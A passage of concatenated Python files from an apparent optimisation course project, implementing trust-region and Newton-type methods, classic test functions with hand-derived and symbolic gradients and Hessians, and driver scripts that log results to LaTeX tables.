        write_latex_name = "EPS_{}_delta{}.txt".format(m, delta)
    elif args.test_fucntion == "Trig":
        X = np.array([1 / m] * int(m))
        test_function = functions.Trigonometric(m)
        f_function = test_function.func
        g_function = test_function.gfunc
        G_function = test_function.hess_func
        write_latex_name = "Trig_{}_delta{}.txt".format(m, delta)
    elif args.test_fucntion == "Wood":
        # BUG FIX: this branch previously re-tested "Trig", which made the
        # "Wood" choice unreachable (and crashed later with an undefined
        # write_latex_name).
        X = np.array([-3, -1, -3, -1])
        f_function = functions.wood
        diff_wood_list, symbols_wood_list = functions.diff_wood_expression()
        g_function = functools.partial(functions.g_wood, diff_list=diff_wood_list, symbols_list=symbols_wood_list)
        hess_wood_lists, symbols_wood_list = functions.hess_wood_expression()
        G_function = functools.partial(functions.G_wood, G_lists=hess_wood_lists, symbols_list=symbols_wood_list)
        write_latex_name = "Wood_delta{}.txt".format(delta)
    elif args.test_fucntion == "Penalty1":
        X = np.array(range(1, m + 1))
        test_function = functions.Penalty1(m)
        f_function = test_function.func
        g_function = test_function.gfunc
        G_function = test_function.hess_func
        write_latex_name = "Penalty1_{}_delta{}.txt".format(m, delta)
    elif args.test_fucntion == "EFR":
        X = np.array([-2.] * m)
        test_function = functions.Extended_Freudenstein_Roth(m)
        f_function = test_function.func
        g_function = test_function.gfunc
        G_function = test_function.hess_func
        write_latex_name = "EFR_{}_delta{}.txt".format(m, delta)
    elif args.test_fucntion == "ER":
        test_function = functions.Extended_Rosenbrock(m)
        X = np.zeros(m)
        t = np.array(range(int(m / 2)))
        X[2 * t] = -1.2
        X[2 * t + 1] = 1
        f_function = test_function.func
        g_function = test_function.gfunc
        G_function = test_function.hess_func
        write_latex_name = "ER_{}_delta{}.txt".format(m, delta)

    logger.info("== " * 20 + " {} ".format(write_latex_name) + "== " * 20)
    write_latex = open(write_latex_name, 'w')
    # Run each subproblem solver in turn and append one LaTeX table row per
    # solver (the three run/report sections were previously copy-pasted).
    for log_label, latex_label, run_hyper_parameters in (
        ("Hebden方法", "Hebden", Hebden_hyper_parameters),
        ("More-Sorensen方法", "More-Sorensen", Sorensen_hyper_parameters),
        ("二维子空间极小化", "二维子空间极小化", TSM_hyper_parameters),
    ):
        logger.info(log_label)
        X_star, func_X_star, iter_num, function_num, TR_iter_num, cpu_time = trust_region_method(
            X, f_function, g_function, G_function, hyper_parameters=run_hyper_parameters)
        write_latex.write(" {label} & {fx} & {iter_num} & {func_k} & {TR_k} & {cpu_time} & {is_conv} \\\\ \n".format(
            label=latex_label,
            fx=format(func_X_star, ".4e"),
            iter_num=str(iter_num),
            func_k=str(function_num),
            TR_k=str(TR_iter_num),
            cpu_time=round(cpu_time, 4),
            is_conv="是" if func_X_star < 1e-5 else "否"
        ))
    write_latex.close()  # BUG FIX: the file handle was previously leaked
--- FILE SEPARATOR ---
import numpy as np
import math
from goto import with_goto
import random
from utils import is_pos_def
from scipy import optimize
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
def two_subspace_min(X, func, gfunc, hess_func, delta, hyper_parameters=None, epsilon=1e-10, max_epoch=10000):
    """Two-dimensional subspace minimization for the trust-region subproblem.

    Minimizes the quadratic model over span{g, G^{-1} g}.  Note that this is a
    direct (non-iterative) method, hence the returned iteration count is 0.

    Args:
        X ([np.array]): current iterate
        func (callable): objective function (unused here; interface parity)
        gfunc (callable): gradient of the objective
        hess_func (callable): Hessian of the objective
        delta (float): trust-region radius of the subproblem constraint
        hyper_parameters (dict, optional): unused here; kept for interface parity
        epsilon (float, optional): tolerance parameter (unused in this body)
        max_epoch (int, optional): unused; the method is not iterative
    Returns:
        (d, k): the step d = alpha*g + beta*G^{-1}g and k == 0.
    """
    k = 0
    I = np.identity(len(X))
    G = hess_func(X)
    # If G is not positive definite, shift by v in (-lambda_min, -2*lambda_min)
    # (fixed at -1.5*lambda_min) so G + v*I is SPD and invertible.
    if not is_pos_def(G):
        values, _vector = np.linalg.eig(G)
        values = sorted(values)
        lambda_n = values[0]
        # v = random.uniform(-lambda_n, -2 * lambda_n)
        v = - 3 / 2 * lambda_n
        G = G + v * I
    inv_G = np.linalg.inv(G)
    g = gfunc(X)
    abs_g = np.linalg.norm(g)
    inv_G_g = inv_G @ g
    # Reduced 2x2 problem in the basis {g, G^{-1} g}:
    # g_tilde = [g.g, g.G^{-1}g]; G_tilde[i][j] = b_i' G b_j;
    # G_overline is (twice) the Gram matrix of the basis (for the norm constraint).
    g_tilde = np.array([abs_g**2, g @ inv_G @ g], dtype=float)
    G_tilde = np.array(
        [[g @ G @ g, abs_g**2 ],
        [abs_g**2, g @ inv_G @ g]],
        dtype=float)
    G_overline = 2 * np.array(
        [[abs_g**2, g @ inv_G @ g],
        [g @ inv_G @ g, np.linalg.norm(inv_G_g) ** 2]],
        dtype=float)
    inv_G_tilde = np.linalg.inv(G_tilde)
    # Unconstrained minimizer of the reduced quadratic.
    u_star = - inv_G_tilde @ g_tilde
    # 1/2 u' G_overline u equals ||alpha*g + beta*G^{-1}g||^2; accept u_star
    # when it is inside the trust region.
    if 1/2 * (u_star @ G_overline @ u_star) <= delta ** 2:
        u = u_star
    else:
        # Otherwise solve for the Lagrange multiplier lambda that puts the
        # step exactly on the trust-region boundary.
        def fun(x):
            input = - np.linalg.inv(G_tilde + x * G_overline) @ g_tilde
            return [1/2 * (input @ G_overline @ input) - delta ** 2]
        lambda_sol = optimize.root(fun, [0])
        lambda_ = float(lambda_sol.x)
        u = - np.linalg.inv(G_tilde + lambda_ * G_overline) @ g_tilde
    # Map the reduced solution back to the full space.
    alpha = u[0]
    beta = u[1]
    d = alpha * g + beta * inv_G_g
    return d, k
--- FILE SEPARATOR ---
import numpy as np
import math
import scipy
import sympy
from sympy import diff
from sympy import symbols
import functools
import pickle
from numpy import sin, cos, sum
def wood(X):
    """Evaluate the 4-dimensional Wood test function at X.

    Args:
        X ([np.array]): input point; exactly the first four components are read
    Returns:
        [float]: function value
    """
    a, b, c, d = X[0], X[1], X[2], X[3]
    terms = (
        100 * (a * a - b)**2,
        (a - 1)**2,
        (c - 1)**2,
        90 * (c * c - d)**2,
        10.1 * ((b - 1)**2 + (d - 1)**2),
        19.8 * (b - 1) * (d - 1),
    )
    return sum(terms)
def diff_wood_expression():
    """Build the symbolic gradient of the Wood function.

    Returns:
        ([sympy expressions], (x1, x2, x3, x4)): the four partial derivatives
        and the corresponding symbol tuple.
    """
    x1, x2, x3, x4 = symbols("x1,x2,x3,x4")
    variables = (x1, x2, x3, x4)
    wood_func = 100 * (x1 ** 2 - x2)**2 + (x1 - 1)**2 + (x3 - 1)**2 + 90 * (x3 ** 2 - x4)**2 + 10.1 * ((x2 - 1)**2 + (x4 - 1)**2) + 19.8 * (x2 - 1) * (x4 - 1)
    return [diff(wood_func, v) for v in variables], variables
def g_wood(X, diff_list=None, symbols_list=None):
    """Evaluate the gradient of the Wood function at X.

    Args:
        X ([np.array]): input point
        diff_list ([list]): symbolic partial-derivative expressions
        symbols_list ([list]): the symbols matching the components of X
    Returns:
        [np.array]: gradient values at X, or None when diff_list is missing.
    """
    if diff_list is None:
        return None
    substitutions = [(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]
    return np.array([expr.subs(substitutions) for expr in diff_list], 'float')
def hess_wood_expression():
    """Build the symbolic 4x4 Hessian of the Wood function.

    Returns:
        (G, (x1, x2, x3, x4)): nested list of sympy second derivatives and the
        symbol tuple.  The matrix is symmetric; mirrored entries share the
        same expression objects.
    """
    x1, x2, x3, x4 = sympy.symbols('x1,x2,x3,x4')
    variables = (x1, x2, x3, x4)
    wood_func = 100 * (x1 ** 2 - x2)**2 + (x1 - 1)**2 + (x3 - 1)**2 + 90 * (x3 ** 2 - x4)**2 + 10.1 * ((x2 - 1)**2 + (x4 - 1)**2) + 19.8 * (x2 - 1) * (x4 - 1)
    gradient = [sympy.diff(wood_func, v) for v in variables]
    # Compute the lower triangle (including the diagonal) once and mirror it.
    G = [[None] * 4 for _ in range(4)]
    for i in range(4):
        for j in range(i + 1):
            entry = sympy.diff(gradient[i], variables[j])
            G[i][j] = entry
            G[j][i] = entry
    return G, variables
def G_wood(X, G_lists=None, symbols_list=None):
    """Evaluate the Hessian of the Wood function at X.

    Args:
        X ([np.array]): input point
        G_lists ([list]): nested list of symbolic Hessian entries
        symbols_list ([list]): the symbols matching the components of X
    Returns:
        [np.array]: Hessian values at X, or None when G_lists is missing.
    """
    if G_lists is None:
        return None
    substitutions = [(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]
    return np.array(
        [[entry.subs(substitutions) for entry in row] for row in G_lists],
        'float',
    )
def g_function(X, diff_list=None, symbols_list=None):
    """Evaluate a symbolic gradient at X.

    Args:
        X ([np.array]): input point
        diff_list ([list]): symbolic partial-derivative expressions
        symbols_list ([list]): the symbols matching the components of X
    Returns:
        [np.array]: gradient values at X, or None when diff_list is missing.
    """
    if diff_list is None:
        return None
    substitutions = [(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]
    return np.array([expr.subs(substitutions) for expr in diff_list], 'float')
def hess_expression(m, diff_list=None, symbols_list=None):
    """Build the symbolic m x m Hessian from a symbolic gradient.

    Args:
        m (int): dimension
        diff_list ([list]): symbolic first-derivative expressions
        symbols_list ([list]): the symbols of the function
    Returns:
        (rows, symbols_list): the Hessian as a nested list of sympy
        expressions; mirrored entries share the same expression objects.
    """
    # Lower triangle (including the diagonal), row by row.
    rows = [[sympy.diff(diff_list[i], symbols_list[j]) for j in range(i + 1)]
            for i in range(m)]
    # Complete each row above the diagonal by mirroring the lower triangle.
    for j in range(m):
        rows[j].extend(rows[i][j] for i in range(j + 1, m))
    return rows, symbols_list
def G_function(X, G_lists=None, symbols_list=None):
    """Evaluate a symbolic Hessian at X.

    Args:
        X ([np.array]): input point
        G_lists ([list]): nested list of symbolic Hessian entries
        symbols_list ([list]): the symbols matching the components of X
    Returns:
        [np.array]: Hessian values at X, or None when G_lists is missing.
    """
    if G_lists is None:
        return None
    substitutions = [(symbol, x_i) for symbol, x_i in zip(symbols_list, X)]
    return np.array(
        [[entry.subs(substitutions) for entry in row] for row in G_lists],
        'float',
    )
class Wood:
    """Wood test function wrapped as a class for interface parity."""

    def __init__(self, n):
        # The dimension is recorded only for parity with the other test
        # problems; the Wood function always reads exactly four components.
        self.n = n

    def func(self, X):
        """Return the Wood function value at the 4-vector X."""
        a, b, c, d = X[0], X[1], X[2], X[3]
        return sum((
            100 * (a * a - b)**2,
            (a - 1)**2,
            (c - 1)**2,
            90 * (c * c - d)**2,
            10.1 * ((b - 1)**2 + (d - 1)**2),
            19.8 * (b - 1) * (d - 1),
        ))
class EPS:
    """Extended Powell Singular test function (dimension must be a multiple of 4)."""

    def __init__(self, n):
        assert n % 4 == 0, "Len of X must be a multiple of 4"
        self.n = n

    def func(self, X):
        """Objective value: sum over the independent four-variable groups."""
        def group_value(base):
            # One Powell-singular group over X[base:base+4].
            return sum(((X[base] + 10 * X[base + 1])**2,
                        5 * (X[base + 2] - X[base + 3])**2,
                        (X[base + 1] - 2 * X[base + 2])**4,
                        10 * (X[base] - X[base + 3])**4,
                        ))
        return sum((group_value(base) for base in range(0, len(X), 4)))

    def gfunc(self, X):
        """Hand-derived gradient of the EPS function at X.

        Args:
            X ([np.array]): input point
        Returns:
            [np.array]: gradient values
        """
        m = len(X)
        assert m % 4 == 0  # m should be exactly divisible by 4
        g = np.zeros(m)
        for base in range(0, m, 4):
            x1, x2, x3, x4 = X[base], X[base + 1], X[base + 2], X[base + 3]
            g[base] = 2 * (x1 + 10 * x2) + 40 * math.pow(x1 - x4, 3)
            g[base + 1] = 20 * (x1 + 10 * x2) + 4 * math.pow(x2 - 2 * x3, 3)
            g[base + 2] = 10 * (x3 - x4) - 8 * math.pow(x2 - 2 * x3, 3)
            g[base + 3] = -10 * (x3 - x4) - 40 * math.pow(x1 - x4, 3)
        return g

    def hess_func(self, X):
        """Hand-derived Hessian of the EPS function at X.

        Args:
            X ([np.array]): input point
        Returns:
            [np.array]: Hessian matrix (block-diagonal, 4x4 blocks)
        """
        m = len(X)
        assert m % 4 == 0  # m should be exactly divisible by 4
        G = np.zeros((m, m))
        for base in range(0, m, 4):
            x1, x2, x3, x4 = X[base], X[base + 1], X[base + 2], X[base + 3]
            G[base][base] = 2 + 120 * (x1 - x4) ** 2
            G[base][base + 1] = 20
            G[base][base + 3] = -120 * (x1 - x4) ** 2
            G[base + 1][base] = 20
            G[base + 1][base + 1] = 200 + 12 * (x2 - 2 * x3) ** 2
            G[base + 1][base + 2] = -24 * (x2 - 2 * x3) ** 2
            G[base + 2][base + 1] = G[base + 1][base + 2]
            G[base + 2][base + 2] = 10 + 48 * (x2 - 2 * x3) ** 2
            G[base + 2][base + 3] = -10
            G[base + 3][base] = G[base][base + 3]
            G[base + 3][base + 2] = G[base + 2][base + 3]
            G[base + 3][base + 3] = 10 + 120 * (x1 - x4) ** 2
        return G
class Trigonometric:
    """Trigonometric test function: f = sum_i (n - sum_j cos x_j + (i+1)(1 - cos x_i) - sin x_i)^2.

    NOTE: gfunc/hess_func rely on the module-level ``from numpy import sin, cos, sum``
    so that the expressions below broadcast over (n, 1) column vectors.
    """

    def __init__(self, n):
        # n: problem dimension.
        self.n = n

    def func(self, X):
        """Function value at X, computed term by term with math.cos/math.sin."""
        n = len(X)
        sum_cos = sum((math.cos(x) for x in X))
        return sum(
            ( (n - sum_cos + (idx + 1) * (1 - math.cos(x)) - math.sin(x)) ** 2 for idx, x in enumerate(X))
        )

    def gfunc(self, X):
        """Hand-derived gradient at X (vectorized with numpy broadcasting).

        Args:
            X ([np.array]): input point
        Returns:
            [np.array]: gradient values, shape (n,)
        """
        n = len(X)
        X0 = X.reshape(-1,1)
        # one = column vector [1, 2, ..., n]; the (i+1) weights of the residuals.
        one = np.array([i + 1 for i in range(n)]).reshape(-1, 1)
        constant = n - sum(cos(X0))
        # gamma: the residual vector; gamma_sum: sum of all residuals.
        gamma = constant + one * (1 - cos(X0)) - sin(X0)
        gamma_sum = sum(constant + one * (1 - cos(X0)) - sin(X0))
        g = 2 * gamma * (one * sin(X0) - cos(X0)) + 2 * sin(X0) * gamma_sum
        return g.reshape(n)

    def hess_func(self, X):
        """Hand-derived Hessian at X (vectorized with numpy broadcasting).

        Args:
            X ([np.array]): input point
        Returns:
            [np.array]: Hessian matrix, shape (n, n)
        """
        n = len(X)
        X0 = X.reshape(-1,1)
        constant = n - sum(cos(X))
        one = np.array([i + 1 for i in range(n)]).reshape(-1, 1)
        gamma_sum = sum(constant + one * (1 - cos(X0)) - sin(X0))
        # Diagonal terms; the `n * sin(X0)` factor below presumably comes from
        # differentiating the shared sum term n times — TODO confirm against
        # the analytic derivation.
        diag = 2 * (sin(X0) + one * sin(X0) - cos(X0)) * (one * sin(X0) -cos(X0)) + 2 * (constant + one * (1 - cos(X0)) - sin(X0)) * \
            (one * cos(X0) + sin(X0)) + 2 * cos(X0) * gamma_sum + 2 * sin(X0) * \
            (n * sin(X0) + one * sin(X0) - cos(X0))
        diag = diag.reshape(-1)
        # Off-diagonal terms as a rank-style outer-product combination, then
        # overwrite the diagonal with the dedicated formula above.
        G = 2 * np.matmul((one * sin(X0) - cos(X0)), sin(X0).T) + 2 * np.matmul(sin(X0), (n * sin(X0) + one * sin(X0) - cos(X0)).T)
        for i in range(n):
            G[i][i] = diag[i]
        return G
class Penalty1:
    """Penalty I test function: a*||X - 1||^2 + (X.X - 1/4)^2.

    Groups func/gfunc/hess_func of the same test problem into one class.
    """

    def __init__(self, n, a=1e-5):
        # n: dimension; m = n + 1 residuals; a: penalty coefficient.
        self.n = n
        self.m = n + 1
        self.a = a

    def func(self, X):
        """Objective value at X (X must be a numpy array: matrix ops are used)."""
        col = X.reshape(-1, 1)
        ones = np.ones((self.n, 1))
        dev = col - ones
        value = self.a * np.matmul(dev.T, dev) + (np.matmul(col.T, col) - 1 / 4) ** 2
        return value[0][0]

    def gfunc(self, X):
        """Gradient at X."""
        col = X.reshape(-1, 1)
        ones = np.ones((self.n, 1))
        grad = 2 * self.a * (col - ones) + 4 * (np.matmul(col.T, col) - 1 / 4) * col
        return grad.reshape(self.n)

    def hess_func(self, X):
        """Hessian at X: (2a + 4(X.X - 1/4)) I + 8 X X^T."""
        col = X.reshape(-1, 1)
        eye = np.identity(self.n)
        return 2 * self.a * eye + 4 * (np.matmul(col.T, col) - 1 / 4) * eye + 8 * np.matmul(col, col.T)
class Extended_Freudenstein_Roth:
    """Extended Freudenstein-Roth test function (n must be even; m = n - 1 groups)."""

    def __init__(self, n):
        assert n % 2 == 0, "n must be even"
        self.n = n
        self.m = n - 1

    def func(self, X):
        """Objective value: m overlapping two-variable Freudenstein-Roth groups."""
        total = 0
        for idx in range(self.m):
            u, v = X[idx], X[idx + 1]
            total += ((u + v * ((5 - v) * v - 2) - 13) ** 2 + (u + v * ((v + 1) * v - 14) - 29) ** 2)
        return total

    def gfunc(self, X):
        """Gradient; the first and last components use boundary-specific formulas."""
        last = self.n - 1
        g = np.zeros(self.n)
        g[0] = 4 * X[0] + 12 * X[1] ** 2 - 32 * X[1] - 84
        xp, xl = X[last - 1], X[last]
        g[last] = (-6 * xl ** 2 + 20 * xl - 4) * (xp - xl ** 3 + 5 * xl ** 2 - 2 * xl - 13) + \
            (6 * xl ** 2 + 4 * xl - 28) * (xp + xl ** 3 + xl ** 2 - 14 * xl - 29)
        for i in range(1, last):
            xm, xc, xn = X[i - 1], X[i], X[i + 1]
            g[i] = 4 * xc + 12 * xn ** 2 - 32 * xn + (-6 * xc ** 2 + 20 * xc - 4) * (xm - xc ** 3 + 5 * xc ** 2 - 2 * xc - 13) + \
                (6 * xc ** 2 + 4 * xc - 28) * (xm + xc ** 3 + xc ** 2 - 14 * xc - 29) - 84
        return g

    def hess_func(self, X):
        """Hessian: tridiagonal structure (adjacent variables only interact)."""
        last = self.n - 1
        G = np.zeros((self.n, self.n))
        G[0][0] = 4
        xp, xl = X[last - 1], X[last]
        G[last][last] = (20 - 12 * xl) * (xp - xl ** 3 + 5 * xl ** 2 - 2 * xl - 13) + \
            (12 * xl + 4) * (xp + xl ** 3 + xl ** 2 - 14 * xl - 29) + \
            (-6 * xl ** 2 + 20 * xl - 4) * (-3 * xl ** 2 + 10 * xl - 2) + (3 * xl ** 2 + 2 * xl - 14) * (6 * xl ** 2 + 4 * xl - 28)
        for i in range(last):
            G[i][i + 1] = 24 * X[i + 1] - 32
            G[i + 1][i] = G[i][i + 1]
        for i in range(1, last):
            xm, xc = X[i - 1], X[i]
            G[i][i] = (20 - 12 * xc) * (xm - xc ** 3 + 5 * xc ** 2 - 2 * xc - 13) + (12 * xc + 4) * (xm + xc ** 3 + xc ** 2 - 14 * xc - 29) + \
                (-6 * xc ** 2 + 20 * xc - 4) * (-3 * xc ** 2 + 10 * xc - 2) + (3 * xc ** 2 + 2 * xc - 14) * (6 * xc ** 2 + 4 * xc - 28) + 4
        return G
class Extended_Rosenbrock:
    """Extended Rosenbrock test function (n must be even; n/2 independent pairs)."""

    def __init__(self, n):
        assert n % 2 == 0, "n must be even"
        self.n = n
        self.m = n

    def func(self, X):
        """Objective value, vectorized over the (x_{2i}, x_{2i+1}) pairs."""
        even = 2 * np.arange(self.n // 2)
        parts = np.zeros(self.n)
        parts[even] = 100 * (X[even + 1] - X[even] ** 2) ** 2
        parts[even + 1] = (1 - X[even]) ** 2
        return np.sum(parts)

    def gfunc(self, X):
        """Gradient, vectorized over the pairs."""
        even = 2 * np.arange(self.n // 2)
        g = np.zeros(self.n)
        g[even] = 400 * (X[even] ** 2 - X[even + 1]) * X[even] + 2 * (X[even] - 1)
        g[even + 1] = -200 * (X[even] ** 2 - X[even + 1])
        return g

    def hess_func(self, X):
        """Hessian: block-diagonal with 2x2 blocks, one per pair."""
        G = np.zeros((self.n, self.n))
        for pair in range(self.n // 2):
            a, b = 2 * pair, 2 * pair + 1
            G[a][a] = 1200 * X[a] ** 2 - 400 * X[b] + 2
            G[b][b] = 200
            G[b][a] = -400 * X[a]
            G[a][b] = G[b][a]
        return G
def diff_penalty1(n, a=1e-5):
    """Build the symbolic gradient of the Penalty I function.

    Args:
        n ([int]): dimension of X
        a (float): penalty coefficient
    Returns:
        ([sympy expressions], symbols): the n partial derivatives and the symbols.
    """
    symbols_X = symbols("x:{}".format(n))
    quadratic_part = a * sum(((x - 1) ** 2 for x in symbols_X))
    constraint_part = (sum((x ** 2 for x in symbols_X)) - 1 / 4) ** 2
    penalty_func = quadratic_part + constraint_part
    return [diff(penalty_func, s) for s in symbols_X], symbols_X
def diff_EFR(n):
    """Build the symbolic gradient of the Extended Freudenstein-Roth function.

    Args:
        n ([int]): dimension of X
    Returns:
        ([sympy expressions], symbols): the n partial derivatives and the symbols.
    """
    symbols_X = symbols("x:{}".format(n))
    f = 0
    # m = n - 1 overlapping two-variable groups.
    for i in range(n - 1):
        u, v = symbols_X[i], symbols_X[i + 1]
        f += ((u + 5 * (v ** 2) - v ** 3 - 2 * v - 13) ** 2 +
              (u + v ** 3 + v ** 2 - 14 * v - 29) ** 2)
    return [diff(f, s) for s in symbols_X], symbols_X
def diff_ER(n):
    """Build the symbolic gradient of the Extended Rosenbrock function.

    Args:
        n ([int]): dimension of X (even)
    Returns:
        ([sympy expressions], symbols): the n partial derivatives and the symbols.
    """
    symbols_X = symbols("x:{}".format(n))
    f = 0
    # n/2 independent Rosenbrock pairs.
    for i in range(int(n / 2)):
        a, b = symbols_X[2 * i], symbols_X[2 * i + 1]
        f += (100 * (b - a ** 2) ** 2)
        f += (1 - a) ** 2
    return [diff(f, s) for s in symbols_X], symbols_X
def test():
    """Ad-hoc smoke test: evaluate the Extended Freudenstein-Roth problem.

    The large body of commented-out experiments with the other test
    functions (Wood, EPS, Trigonometric, Penalty1, Extended Rosenbrock and
    the cached sympy-expression pickling) was dead code and has been
    removed; consult version control if any of it is needed again.
    """
    for n in [4]:
        x0 = np.array(range(1, n + 1))
        EFR = Extended_Freudenstein_Roth(n)
        print(EFR.func(x0))
        print(EFR.gfunc(x0))
        print(EFR.hess_func(x0))
def main():
    """Entry point: run the ad-hoc test driver."""
    test()
if __name__ == "__main__":
    main()
--- FILE SEPARATOR ---
import functions
import Newton_Methods.fletcher_freeman as FF
import Newton_Methods.newton_method as newton_method
import utils
import numpy as np
import functools
import pickle
import argparse
from multiprocessing.pool import Pool
import os
import multiprocessing
import logging
logging.basicConfig(format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
datefmt='%d-%m-%Y:%H:%M:%S')
logging.getLogger().setLevel(logging.DEBUG)
logger = logging.getLogger(__name__)
"""
精确线搜索超参数:
进退法:
r: 步长更新的步长
t: >1的步长放大率
0.618法:
epsilon: 终止条件阈值
非精确线搜索超参数:
rho: Armijo准则中的参数, range in (0, 1/2).
sigma: Wolfe准则中的参数, range in (rho, 1).
阻尼牛顿法超参数:
use_modified_Cholesky: 是否使用修正Cholesky分解计算下降方向
GM稳定牛顿法超参数:
zeta: 当gk的模大于zeta, 求解方程得到下降方向
修正Cholesky分解超参数:
u: 机器精度
对于任何最优化算法来说都的超参数:
search_mode: 线搜索方法,从["ELS", "ILS"]中选择
epsilon: 当函数值下降小于epsilon,迭代结束
max_epoch: 最大允许的迭代次数
"""
# Inexact line-search acceptance criteria; index 0 (Armijo-Goldstein) is used
# by every ILS configuration below.
CRITERION = ["Armijo Goldstein", "Wolfe Powell", "Strong Wolfe Powell"]
ILS_criterion = CRITERION[0]
# Damped Newton + exact line search: with the plain Newton direction it does
# not converge; with the modified-Cholesky direction it does.
ELS_damp_newton_hyper_parameters = {
    "ELS": {
        "retreat_method": {
            "a0" : 0,
            "r": 1e-8,
            "t": 1.5,
        },
        "golden_method": {
            "epsilon": 1e-6,
        }
    },
    "damp_newton": {
        "use_modified_Cholesky" : False,
    },
    "modified_Cholesky": {
        "u": 1e-20,
    },
    "search_mode": "ELS",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=ELS_damp_newton_hyper_parameters)
# Damped Newton + inexact line search: converges.
ILS_damp_newton_hyper_parameters = {
    "ILS": {
        "rho": 0.2,
        "sigma": 0.5,
        "t": 5,
        "alpha0": 1e-8,
        "criterion": ILS_criterion
    },
    "damp_newton": {
        "use_modified_Cholesky" : False,
    },
    "modified_Cholesky": {
        "u": 1e-20,
    },
    "search_mode": "ILS",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=ILS_damp_newton_hyper_parameters)
# Damped Newton + GLL (nonmonotone) line search: converges.
GLL_damp_newton_hyper_parameters = {
    "GLL": {
        "rho": 0.25,
        "sigma": 0.5,
        "M": 15,
        "a": 1,
    },
    "damp_newton": {
        "use_modified_Cholesky" : False,
    },
    "modified_Cholesky": {
        "u": 1e-20,
    },
    "search_mode": "GLL",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.damp_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=GLL_damp_newton_hyper_parameters)
# GM stabilized Newton + exact line search: converges.
ELS_GM_newton_hyper_parameters = {
    "ELS": {
        "retreat_method": {
            "a0" : 0,
            "r": 1e-10,
            "t": 1.5,
        },
        "golden_method": {
            "epsilon": 1e-7,
        }
    },
    "GM_newton": {
        "zeta": 1e-8,
    },
    "modified_Cholesky": {
        "u": 1e-20,
    },
    "search_mode": "ELS",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# X_star, func_X_star, iter_num = newton_method.GM_newton(x0, functions.wood, g_wood_partial, G_wood_partial, hyper_parameters=ELS_GM_newton_hyper_parameters)
# GM stabilized Newton + inexact line search: converges.
ILS_GM_newton_hyper_parameters = {
    "ILS": {
        "rho": 0.2,
        "sigma": 0.5,
        "t": 5,
        "alpha0": 1e-8,
        "criterion": ILS_criterion
    },
    "GM_newton": {
        "zeta": 1e-8,
    },
    "modified_Cholesky": {
        "u": 1e-20,
    },
    "search_mode": "ILS",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# GM stabilized Newton + GLL line search.
GLL_GM_newton_hyper_parameters = {
    "GLL": {
        "rho": 0.25,
        "sigma": 0.5,
        "M": 15,
        "a": 1,
    },
    "GM_newton": {
        "zeta": 1e-8,
    },
    "modified_Cholesky": {
        "u": 1e-20,
    },
    "search_mode": "GLL",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# Fletcher-Freeman + exact line search.
ELS_FF_hyper_parameters = {
    "ELS": {
        "retreat_method": {
            "a0" : 0,
            "r": 1e-10,
            "t": 1.5,
        },
        "golden_method": {
            "epsilon": 1e-7,
        }
    },
    "search_mode": "ELS",
    "epsilon": 1e-8,
    "max_epoch": 10000,
}
# Fletcher-Freeman + inexact line search.
ILS_FF_hyper_parameters = {
    "ILS": {
        "rho": 0.1,
        "sigma": 0.4,
        "t": 5,
        "alpha0": 1e-6,
        "criterion": ILS_criterion
    },
    "search_mode": "ILS",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# Fletcher-Freeman + GLL line search: converges.
GLL_FF_hyper_parameters = {
    "GLL": {
        "rho": 0.25,
        "sigma": 0.5,
        "M": 12,
        "a": 1,
    },
    "search_mode": "GLL",
    "epsilon": 1e-8,
    "max_epoch": 1000,
}
# Parallel lists: method callable, human-readable name and hyper-parameter
# dict for the 3x3 grid (damped Newton / GM Newton / FF) x (ELS / ILS / GLL).
method_list = [newton_method.damp_newton, newton_method.damp_newton, newton_method.damp_newton,
    newton_method.GM_newton, newton_method.GM_newton, newton_method.GM_newton,
    FF.Fletcher_Freeman, FF.Fletcher_Freeman, FF.Fletcher_Freeman]
method_name_list = ["精确线搜索下的阻尼牛顿法", "非精确线搜索下的阻尼牛顿法", "GLL线搜索下的阻尼牛顿法",
    "精确线搜索下的GM稳定牛顿法", "非精确线搜索下的GM稳定牛顿法", "GLL线搜索下的GM稳定牛顿法",
    "精确线搜索下的FF方法", "非精确线搜索下的FF方法", "GLL线搜索下的FF方法"]
hyper_parameters_list = [ELS_damp_newton_hyper_parameters, ILS_damp_newton_hyper_parameters, GLL_damp_newton_hyper_parameters,
    ELS_GM_newton_hyper_parameters, ILS_GM_newton_hyper_parameters, GLL_GM_newton_hyper_parameters,
    ELS_FF_hyper_parameters, ILS_FF_hyper_parameters, GLL_FF_hyper_parameters]
# Command-line setup and test-problem selection for the Newton-method
# comparison script.  NOTE(review): the flag name "--test_fucntion" is a typo
# but is kept because it is the script's established CLI interface.
parser = argparse.ArgumentParser(description='Optimization')
parser.add_argument("--m", type=int, default=20, help="测试函数的维度")
parser.add_argument("--test_fucntion", choices=["Wood", "EPS", "Trig"], type=str, default="EPS", help="测试函数的维度")
args = parser.parse_args()
m = args.m
if args.test_fucntion == "EPS":
    # NOTE(review): functions.extended_powell_singular / g_EPS / G_EPS are not
    # visible in the functions module shown here — confirm they still exist.
    x0 = np.array([3, -1, 0, 1] * int(m//4))
    f_funciton = functions.extended_powell_singular
    g_function = functions.g_EPS
    G_function = functions.G_EPS
    write_latex_name = "EPS_{}.txt".format(m)
elif args.test_fucntion == "Trig":
    x0 = np.array([1/m] * int(m))
    f_funciton = functions.trigonometric
    g_function = functions.g_trigonometric
    G_function = functions.G_trigonometric
    write_latex_name = "Trig_{}.txt".format(m)
else:
    # "Wood": symbolic gradient/Hessian bound via functools.partial.
